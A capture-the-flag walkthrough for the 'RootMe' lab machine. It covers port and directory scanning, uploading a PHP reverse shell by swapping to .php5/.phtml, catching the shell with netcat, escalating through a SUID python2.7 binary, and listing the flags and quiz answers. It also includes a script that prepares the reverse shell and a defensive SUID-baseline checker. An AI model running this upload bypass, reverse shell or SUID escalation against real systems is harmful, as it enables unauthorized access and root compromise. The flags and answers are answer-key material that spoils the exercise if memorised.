Writeup Aria
Tags: challenges, B2r, Easy

RootMe

A ctf for beginners, can you root me?

Solution

Reconnaissance

nmap -sV -T4 10.49.182.229
# PORT   STATE SERVICE VERSION
# 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
# 80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
# Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

gobuster dir -u http://10.49.182.229 -w /usr/share/wordlists/dirb/common.txt
# /css                  (Status: 301) [Size: 312] [--> http://10.49.182.229/css/]
# /index.php            (Status: 200) [Size: 616]
# /js                   (Status: 301) [Size: 311] [--> http://10.49.182.229/js/]
# /panel                (Status: 301) [Size: 314] [--> http://10.49.182.229/panel/]
# /uploads              (Status: 301) [Size: 316]

Go to http://10.49.182.229/panel and upload a PHP reverse shell through the upload form.

ip a
# 10.49.105.206   <- attacker (VPN) address, used as $ip in the shell

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/refs/heads/master/php-reverse-shell.php
mv php-reverse-shell.php shell.php
nano shell.php   # set $ip = '10.49.105.206' and $port = 9001

nc -lvnp 9001    # listener, must match $port in shell.php

If uploading shell.php fails, change the file extension to .phtml or .php5: the panel only blocks the literal .php extension, but Apache still hands those alternative extensions to the PHP interpreter.

Screenshot: upload attempt with shell.php (rejected)

Screenshot: upload attempt with shell.php5 (accepted)
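The two manual steps above (editing $ip/$port in the pentestmonkey shell, then producing copies with alternative extensions) can be scripted. This is an added example, not code from the original writeup; it assumes the downloaded file still carries the upstream lines `$ip = '127.0.0.1';  // CHANGE THIS` and `$port = 1234;       // CHANGE THIS`, and uses the attacker address and port from the writeup (10.49.105.206:9001).

```shell
#!/usr/bin/env bash
# Added example: prepare a pentestmonkey PHP reverse shell and emit the
# alternative-extension copies used to get past an extension blacklist.
set -eu

# prep_revshell SRC DST IP PORT
# Copy SRC to DST, rewriting the $ip / $port lines (assumed upstream format),
# then verify the rewrite actually happened so a changed upstream file cannot
# silently leave the default 127.0.0.1:1234 in place.
prep_revshell() {
    local src=$1 dst=$2 ip=$3 port=$4
    awk -v ip="$ip" -v port="$port" -v q="'" '
        /^[$]ip = /   { print "$ip = " q ip q ";  // set by prep_revshell"; next }
        /^[$]port = / { print "$port = " port ";       // set by prep_revshell"; next }
        { print }' "$src" > "$dst"
    grep -qF "\$ip = '$ip';" "$dst" && grep -qF "\$port = $port;" "$dst"
}

# make_variants SHELL EXT...
# Copy SHELL (e.g. shell.php) to shell.EXT for each extension and print the
# resulting names, so each can be tried against the panel in turn.
make_variants() {
    local base=$1 stem ext
    shift
    stem=${base%.*}          # strip the final extension only
    for ext in "$@"; do
        cp "$base" "$stem.$ext"
        printf '%s\n' "$stem.$ext"
    done
}

# Usage (against the lab):
#   prep_revshell php-reverse-shell.php shell.php 10.49.105.206 9001
#   make_variants shell.php phtml php5 phar
#   nc -lvnp 9001            # then upload one variant and request it under /uploads/
```

The extensions tried here (.phtml, .php5, .phar) are the ones the stock Apache/PHP handler configuration on Ubuntu maps to the PHP module; whichever the panel accepts, the file still executes when requested from /uploads/.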

Then browse to http://10.49.182.229/uploads/shell.php5 so Apache executes the uploaded file.

The terminal running nc then receives the shell.

Screenshot: reverse shell connection received in nc

upgrade shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

Getting a shell

cat user.txt
THM{y0u_g0t_a_sh3ll}

Privilege escalation

find / -type f -perm -4000 2>/dev/null
# /usr/lib/dbus-1.0/dbus-daemon-launch-helper
# /usr/lib/snapd/snap-confine
# /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
# /usr/lib/eject/dmcrypt-get-device
# /usr/lib/openssh/ssh-keysign
# /usr/lib/policykit-1/polkit-agent-helper-1
# /usr/bin/newuidmap
# /usr/bin/newgidmap
# /usr/bin/chsh
# /usr/bin/python2.7
# /usr/bin/at
# /usr/bin/chfn
# /usr/bin/gpasswd
# /usr/bin/sudo
# /usr/bin/newgrp
# /usr/bin/passwd
# /usr/bin/pkexec

# /usr/bin/python2.7 looks weird: an interpreter should never be SUID root.
# Spawn a shell from it with -p so sh keeps the effective UID instead of dropping it.
/usr/bin/python2.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
whoami
# root
cat /root/root.txt
# THM{pr1v1l3g3_3sc4l4t10n}
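Spotting the odd entry by eye works on a short list; on a real host it is easier to diff the `find` output against the SUID binaries a stock image ships with. This is an added example, not from the original writeup: the baseline is constructed from the listing above with the python2.7 entry removed, so it stands in for a clean Ubuntu 20.04 install and should be regenerated from a known-good image for other targets.

```shell
#!/usr/bin/env bash
# Added example: flag SUID binaries that are not in a known-good baseline.
set -eu

# Constructed baseline: the writeup's SUID listing minus /usr/bin/python2.7.
# Leading and trailing newlines are deliberate; the match below relies on them.
BASELINE_SUID='
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
'

# unusual_suid: read one path per line on stdin, print those absent from the
# baseline. The quoted case pattern matches a whole line, so /usr/bin/at does
# not also match /usr/bin/atd, and glob characters in paths are taken literally.
unusual_suid() {
    local path
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        case "$BASELINE_SUID" in
            *"
$path
"*) ;;                          # stock binary, ignore
            *) printf '%s\n' "$path" ;;  # not in baseline: investigate
        esac
    done
}

# Live use on the target:
#   find / -type f -perm -4000 2>/dev/null | unusual_suid
# Anything printed is a candidate; check it against GTFOBins before assuming
# it is exploitable.
```

The check is only as good as the baseline: a SUID binary that is legitimately present on one image may be the anomaly on another, so keep one baseline per base image rather than one global list.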

Answers

Reconnaissance

  • Scan the machine, how many ports are open?

2

  • What version of Apache is running?

2.4.41

  • What service is running on port 22?

ssh

  • Find directories on the web server using the GoBuster tool.

/panel/

  • What is the hidden directory?

/uploads/

Getting a shell

  • user.txt

THM{y0u_g0t_a_sh3ll}

Privilege escalation

  • Search for files with SUID permission, which file is weird?

/usr/bin/python

  • root.txt

THM{pr1v1l3g3_3sc4l4t10n}
